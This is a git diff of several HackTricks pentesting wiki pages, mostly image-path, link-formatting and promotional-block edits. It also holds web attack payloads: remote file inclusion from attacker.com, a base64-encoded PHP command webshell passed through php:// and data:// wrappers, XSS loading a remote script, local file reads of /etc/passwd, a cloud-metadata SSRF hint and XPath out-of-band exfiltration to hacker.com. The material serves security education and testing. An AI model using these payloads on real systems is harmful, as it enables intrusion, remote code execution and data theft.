@ -176,7 +188,7 @@ This vulnerability could allow you to **bypass reverse proxies restrictions** by
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -190,9 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -603,7 +601,7 @@ with open(PASS_LIST, "r") as f:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -187,13 +187,35 @@ Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/
|
||||||
http://example.com/index.php?page=PhP://filter
|
http://example.com/index.php?page=PhP://filter
|
||||||
```
|
```
|
||||||
|
|
||||||
## Basic RFI
|
## Remote File Inclusion
|
||||||
|
|
||||||
|
In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
http://example.com/index.php?page=http://atacker.com/mal.php
|
http://example.com/index.php?page=http://atacker.com/mal.php
|
||||||
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
||||||
```
|
```
|
||||||
|
|
||||||
|
If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** access to external webpages, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), you could use for example the data protocol with base64 to decode a b64 PHP code and egt RCE:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```
|
||||||
|
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
{% hint style="info" %}
|
||||||
|
In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Another example **not using the `php://` protocol** would be:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```
|
||||||
|
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
## Python Root element
|
## Python Root element
|
||||||
|
|
||||||
In python in a code like this one:
|
In python in a code like this one:
|
||||||
|
@ -449,7 +471,7 @@ It's also possible to get RCE in a vulnerable "assert" statement using the syste
|
||||||
|
|
||||||
Be sure to URL-encode payloads before you send them.
|
Be sure to URL-encode payloads before you send them.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -484,12 +506,9 @@ For the technical details check the mentioned post!
|
||||||
|
|
||||||
## LFI2RCE
|
## LFI2RCE
|
||||||
|
|
||||||
### Basic RFI
|
### Remote File Inclusion
|
||||||
|
|
||||||
```python
|
Explained previously, [**follow this link**](./#remote-file-inclusion).
|
||||||
http://example.com/index.php?page=http://atacker.com/mal.php
|
|
||||||
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
|
||||||
```
|
|
||||||
|
|
||||||
### Via Apache/Nginx log file
|
### Via Apache/Nginx log file
|
||||||
|
|
||||||
|
@ -589,14 +608,17 @@ If ssh is active check which user is being used (/proc/self/status & /etc/passwd
|
||||||
### **Via** **vsftpd** _**logs**_
|
### **Via** **vsftpd** _**logs**_
|
||||||
|
|
||||||
The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.
|
The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.
|
||||||
|
|
||||||
### Via php base64 filter (using base64)
|
### Via php base64 filter (using base64)
|
||||||
as shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article,PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64.
|
|
||||||
Here is an example payload:
|
as shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article,PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64. Here is an example payload:
|
||||||
|
|
||||||
```url
|
```url
|
||||||
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
|
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
|
||||||
|
|
||||||
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Via php filters (no file needed)
|
### Via php filters (no file needed)
|
||||||
|
|
||||||
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
|
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
|
||||||
|
@ -677,7 +699,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
|
||||||
|
|
||||||
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
|
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -90,8 +90,6 @@ Other useful extensions:
|
||||||
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
||||||
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Other Tricks to check
|
### Other Tricks to check
|
||||||
|
|
||||||
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
||||||
|
@ -118,7 +116,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
|
||||||
|
|
||||||
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (1) (3) (1).png>)
|
![](<../../.gitbook/assets/image (1) (3) (1) (1).png>)
|
||||||
|
|
||||||
## **uWSGI RCE**
|
## **uWSGI RCE**
|
||||||
|
|
||||||
|
@ -184,8 +182,11 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
||||||
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
||||||
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
||||||
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
* [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
|
|
||||||
|
* [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
|
||||||
|
|
||||||
## From File upload to other vulnerabilities
|
## From File upload to other vulnerabilities
|
||||||
|
|
||||||
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -327,7 +327,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
|
||||||
* Long password (>200) leads to DoS
|
* Long password (>200) leads to DoS
|
||||||
* Append second email param and value
|
* Append second email param and value
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -86,7 +86,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
|
||||||
| //\* | Selects all elements in the document |
|
| //\* | Selects all elements in the document |
|
||||||
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
|
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -332,7 +332,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
|
||||||
|
|
||||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -20,6 +20,14 @@ So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going
|
||||||
Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
||||||
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
||||||
|
|
||||||
|
### Popular PDF generation
|
||||||
|
|
||||||
|
* **wkhtmltopdf**: _This is an open source command line tool that uses the WebKit rendering engine to convert HTML and CSS into PDF documents._
|
||||||
|
* **TCPDF**_: A PHP library for generating PDF documents that supports a wide range of features, including images, graphics, and encryption._
|
||||||
|
* **PDFKit :** _A Node.js library that can be used to generate PDF documents from HTML and CSS._
|
||||||
|
* **iText**: _A Java-based library for generating PDF documents that supports a range of features, including digital signatures and form filling._
|
||||||
|
* **FPDF**_: A PHP library for generating PDF documents that is lightweight and easy to use._
|
||||||
|
|
||||||
## Payloads
|
## Payloads
|
||||||
|
|
||||||
### Discovery
|
### Discovery
|
||||||
|
@ -86,7 +94,13 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
||||||
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Read local file
|
### Read local file / SSRF
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**.
|
||||||
|
|
||||||
|
If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<script>
|
<script>
|
||||||
|
@ -112,18 +126,16 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||||
<link rel=attachment href="file:///root/secret.txt">
|
<link rel=attachment href="file:///root/secret.txt">
|
||||||
<object data="file:///etc/passwd">
|
<object data="file:///etc/passwd">
|
||||||
<portal src="file:///etc/passwd" id=portal>
|
<portal src="file:///etc/passwd" id=portal>
|
||||||
|
<embed src="file:///etc/passwd>" width="400" height="400">
|
||||||
|
<style><iframe src="file:///etc/passwd">
|
||||||
|
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
|
||||||
|
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
|
||||||
```
|
```
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
|
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
|
||||||
```
|
```
|
||||||
|
|
||||||
### Get external web page response as attachment (metadata endpoints)
|
|
||||||
|
|
||||||
```markup
|
|
||||||
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
|
||||||
```
|
|
||||||
|
|
||||||
### Bot delay
|
### Bot delay
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
|
@ -177,11 +189,10 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
|
* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
|
||||||
|
* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
|
||||||
{% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %}
|
* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
|
||||||
|
* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
|
||||||
{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -190,7 +201,7 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -84,7 +84,7 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
|
||||||
|
|
||||||
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|